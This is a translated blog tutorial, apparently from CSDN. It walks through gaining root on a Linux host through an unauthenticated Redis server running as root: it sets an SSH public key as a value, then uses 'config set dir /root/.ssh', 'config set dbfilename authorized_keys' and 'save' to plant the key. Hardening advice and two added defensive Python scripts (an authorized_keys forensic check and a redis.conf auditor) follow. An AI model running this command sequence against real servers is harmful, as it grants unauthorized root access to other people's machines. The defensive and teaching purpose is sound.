Root privileges can be obtained through Redis. How is it done?

foreword

I have installed Redis on cloud servers twice, and each time I received a notice that my server was attacking others. (I'm a good person, how could I possibly do bad things?) So my server must have been hacked. It is a personal server with nothing important on it, the port is open all year round, no firewall whitelist is enabled, and most importantly, no password was set. No wonder it was invaded every day. Let's reproduce it below.


principle

There are several ways to log in to Linux; the most commonly used are password login and RSA key login. With RSA key login you generate a matching public/private key pair and put the public key into the /root/.ssh/authorized_keys file on the Linux system; the local client then logs in by importing the corresponding private key. That is the RSA key login method.

But why can Redis be used to obtain root authority on the server?

The RSA key login method above writes the public key into the authorized_keys file on the server side. Redis has a persistence mechanism that generates an RDB file, and that file can be written, through persistence, into root's authorized_keys. The illegitimate public key then ends up in the verification file, and we can log in with the corresponding private key afterwards. (This only works when Redis was started as root, because a non-root process cannot enter the /root directory.)

Generate RSA key

To generate a known public and private key pair, execute the following command on a server you can log in to:

ssh-keygen -t rsa

After execution, the following two files will be generated:


id_rsa is the private key, used by the client to log in;
id_rsa.pub is the public key, which is placed on the server.

You can first verify that you can log in to the server with these two keys. Move the id_rsa.pub file into the /root/.ssh folder:

cp id_rsa.pub /root/.ssh/

Then execute the following command to append the public key to the authorized_keys file:

cat id_rsa.pub >> authorized_keys

Login is now verified by the public key method. After the verification passes, save these two files; they will be used later.


install redis

On the simulated compromised server, install Redis as the root user and enable remote access. If you need a tutorial on installing Redis, you can read this article: Install redis online on Linux

Get root permission through redis

Without knowing the Linux account password we cannot log in to Linux, but we can try to reach the Redis installation that was started as root. First enter the Redis command line.


As mentioned in the principle above, one of Redis's persistence methods generates an RDB file that contains the raw data. We put our public key into the Redis server so that we can later log in to the root account with the private key.

add newline

Add blank lines before and after the content of the id_rsa.pub file; otherwise the persisted file will contain other content that is not separated from the public key, and the key will not be recognised. Execute the following command:

(echo -e '\n\n'; cat id_rsa.pub; echo -e '\n\n') > mykey.pub

The resulting mykey.pub file is what will be persisted in the RDB.

write to redis

Write the mykey.pub file generated above into Redis by executing the following command:

cat mykey.pub | ./redis-cli -h 111.229.209.244 -p 6379 -x set crackit

Check whether the value exists in Redis.


Persistence

This is the most important step: persist the content we wrote into the /root/.ssh/authorized_keys file. This step requires Redis to be running as root, otherwise the file cannot be written.

Select the persistence directory and file name, then save:

// select the persistence directory
config set dir /root/.ssh
// set the name of the persistence file
config set dbfilename authorized_keys
// save
save

verify

Connect using the public key method and import our private key file.

As shown below, the login is successful.


Look at the authorized_keys file


The middle part is the public key we passed in. If you don't add the blank lines, it gets mixed up with the other content and the key may not match. Now that we have root permission, you can do whatever you want. Let's talk about how to protect against this problem.
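A defender who suspects this has happened can check authorized_keys for exactly the symptom shown above: the file starts with the RDB signature, and most of its lines are binary junk that sshd skips, with an intact key line in between. The following is an added example (not code from the original post) that classifies each line of an authorized_keys file. The sample files, the key blobs and the RDB header/trailer bytes are all constructed here and only loosely modelled on the real formats; the second sample omits the blank-line padding to show why the padding matters.

```python
"""Forensic check for an authorized_keys file overwritten by a Redis RDB save.
Added example; sample inputs are constructed, not captured from a real host."""
import base64
import binascii
import re
import struct
from typing import Dict, List, Optional

RDB_MAGIC = b"REDIS"
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")
# key-type, base64 blob, optional comment (option prefixes such as
# command="..." are not handled and will be counted as junk)
KEY_LINE = re.compile(r"^(?P<type>\S+)\s+(?P<blob>[A-Za-z0-9+/]+=*)(?:\s+(?P<comment>.*))?$")


def make_key_line(key_type: str, comment: str) -> str:
    """Build a syntactically valid authorized_keys line (constructed, NOT a usable
    key): an OpenSSH blob starts with a length-prefixed copy of the key type."""
    blob = struct.pack(">I", len(key_type)) + key_type.encode() + b"\x00\x00\x00\x03\x01\x00\x01"
    return f"{key_type} {base64.b64encode(blob).decode()} {comment}"


def _blob_type(blob_b64: str) -> Optional[str]:
    """Return the key type embedded in a base64 blob, or None if malformed."""
    try:
        raw = base64.b64decode(blob_b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) < 4:
        return None
    n = struct.unpack(">I", raw[:4])[0]
    if n > len(raw) - 4:
        return None
    return raw[4:4 + n].decode("ascii", errors="replace")


def audit_authorized_keys(data: bytes) -> Dict[str, object]:
    """Classify every line: rdb_magic (file begins with b'REDIS'), keys (well-formed
    key lines sshd would accept) and junk_lines (lines sshd would silently skip)."""
    result: Dict[str, object] = {"rdb_magic": data.startswith(RDB_MAGIC), "keys": [], "junk_lines": 0}
    keys: List[Dict[str, str]] = result["keys"]  # type: ignore[assignment]
    for raw_line in data.split(b"\n"):
        line = raw_line.strip()
        if not line or line.startswith(b"#"):
            continue
        try:
            text = line.decode("ascii")
        except UnicodeDecodeError:          # binary RDB bytes are never valid ASCII
            result["junk_lines"] += 1       # type: ignore[operator]
            continue
        m = KEY_LINE.match(text)
        if m and m.group("type") in KEY_TYPES and _blob_type(m.group("blob")) == m.group("type"):
            keys.append({"type": m.group("type"), "comment": m.group("comment") or ""})
        else:
            result["junk_lines"] += 1       # type: ignore[operator]
    return result


def looks_like_redis_overwrite(data: bytes) -> bool:
    """True if the file carries the RDB magic or any line sshd would have to skip."""
    r = audit_authorized_keys(data)
    return bool(r["rdb_magic"]) or r["junk_lines"] > 0  # type: ignore[operator]


# Constructed samples. The header/trailer bytes are illustrative, not a real dump.
RDB_HEADER = b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x07crackit\xc2"
RDB_TRAILER = b"\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0\n"
KEY = make_key_line("ssh-rsa", "attacker-constructed").encode()

CONSTRUCTED_RDB_AUTHORIZED_KEYS = RDB_HEADER + b"\n\n" + KEY + b"\n\n\n" + RDB_TRAILER
CONSTRUCTED_RDB_NO_PADDING = RDB_HEADER + KEY + RDB_TRAILER   # key glued to binary
CLEAN_AUTHORIZED_KEYS = (make_key_line("ssh-ed25519", "admin@laptop") + "\n").encode()

if __name__ == "__main__":
    for name, sample in [("padded", CONSTRUCTED_RDB_AUTHORIZED_KEYS),
                         ("no padding", CONSTRUCTED_RDB_NO_PADDING),
                         ("clean", CLEAN_AUTHORIZED_KEYS)]:
        print(name, audit_authorized_keys(sample), looks_like_redis_overwrite(sample))
```

On a live host, run it over /root/.ssh/authorized_keys and the .ssh directory of every account that can run redis-server; a file that starts with `REDIS` or contains lines sshd has to skip is a strong indicator, and the `keys` list tells you which public keys were actually planted.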

protection

This intrusion method requires several conditions to hold at the same time:

  1. Network reachability or public network access
  2. Default port
  3. No firewall or whitelist
  4. No password, or a simple password
  5. Redis started as the root user

The problems above are the main reasons the root account can be obtained. As long as one or two of these conditions are not met, the likelihood of intrusion is greatly reduced. Based on the factors above, several protection measures can be taken:

  • Close public network access
  • Set up a firewall
  • Change the default port
  • Set a complex password
  • Start redis as a non-root user
  • Use a new version of redis

Blocking public network access prevents most malicious attacks. Setting up a firewall and a whitelist blocks 99% of malicious attacks from external networks. Changing the default port to a custom port makes the Redis service harder to find. Setting a password is also essential.

Starting Redis as a non-root user prevents this method of intrusion 100%, because it needs to modify the public key file in root's directory.

Newer versions of Redis do not allow operations without a password by default, so the problem can be avoided that way as well.
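The conditions and countermeasures above map almost one-to-one onto redis.conf directives, so they can be checked mechanically. The following is an added example (not code from the original post) that parses a redis.conf and reports which of the five conditions still hold; the weak and hardened configurations are constructed here. The process owner cannot be read from the config file, so it is passed in as a parameter. One check goes beyond the article's list: disabling the CONFIG command with `rename-command CONFIG ""`, which removes the `config set dir` / `config set dbfilename` step entirely.

```python
"""Audit a redis.conf for the conditions that let the RDB-to-authorized_keys
trick work. Added example; both sample configs are constructed."""
import shlex
from typing import Dict, List

DEFAULT_PORT = 6379
MIN_PASSWORD_LEN = 16   # assumption: the article only says "complex"


def parse_redis_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive (lower-cased) to every argument list seen for it.
    redis.conf is one directive per line; '#' lines are comments; values may be quoted."""
    conf: Dict[str, List[List[str]]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        if parts:
            conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text: str, run_as_user: str) -> List[str]:
    """Return finding codes, in the order of the article's list of conditions.
    run_as_user is the owner of the redis-server process (on a live host:
    `ps -o user= -C redis-server`); it is a parameter so the audit runs offline."""
    conf = parse_redis_conf(text)
    findings: List[str] = []

    # 1. reachable from the network: without a bind line Redis listens everywhere
    binds = [a for args in conf.get("bind", []) for a in args]
    if not binds or any(b in ("0.0.0.0", "::", "*", "-::*") for b in binds):
        findings.append("bind-all-interfaces")

    # 2. default port
    port = int(conf.get("port", [[str(DEFAULT_PORT)]])[-1][0])
    if port == DEFAULT_PORT:
        findings.append("default-port")

    # 3. protected-mode (default yes since Redis 3.2) is the "new version" safeguard:
    #    with it on and no password/bind, Redis refuses remote clients
    if conf.get("protected-mode", [["yes"]])[-1][0].lower() == "no":
        findings.append("protected-mode-off")

    # 4. no or weak password: requirepass, or a Redis 6 ACL 'user' line carrying
    #    a '>cleartext' or '#sha256hex' password token
    passwords = [args[0] for args in conf.get("requirepass", []) if args]
    for args in conf.get("user", []):
        passwords += [a[1:] for a in args if a.startswith((">", "#"))]
    if not passwords:
        findings.append("no-password")
    elif any(len(p) < MIN_PASSWORD_LEN for p in passwords):
        findings.append("weak-password")

    # 5. process owner: only root can write into /root/.ssh
    if run_as_user == "root":
        findings.append("runs-as-root")

    # extra hardening beyond the article: rename CONFIG away so a client cannot
    # change dir / dbfilename at all
    renamed = {args[0].upper(): args[1] for args in conf.get("rename-command", []) if len(args) == 2}
    if renamed.get("CONFIG") != "":
        findings.append("config-command-enabled")
    return findings


# Constructed: the defaults that make the write-up's scenario work
WEAK_CONF = """
bind 0.0.0.0
port 6379
protected-mode no
dir /var/lib/redis
"""

# Constructed: the article's countermeasures expressed as directives
HARDENED_CONF = """
bind 127.0.0.1
port 16379
protected-mode yes
requirepass CorrectHorseBatteryStapleRedis2024!
rename-command CONFIG ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    print("weak, as root:     ", audit_redis_conf(WEAK_CONF, "root"))
    print("hardened, as redis:", audit_redis_conf(HARDENED_CONF, "redis"))
```

An empty result means none of the listed conditions holds. Note that the firewall and whitelist from the article live outside redis.conf (iptables, nftables or the cloud security group) and are not covered by this check.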


Origin blog.csdn.net/AnNanDu/article/details/127225445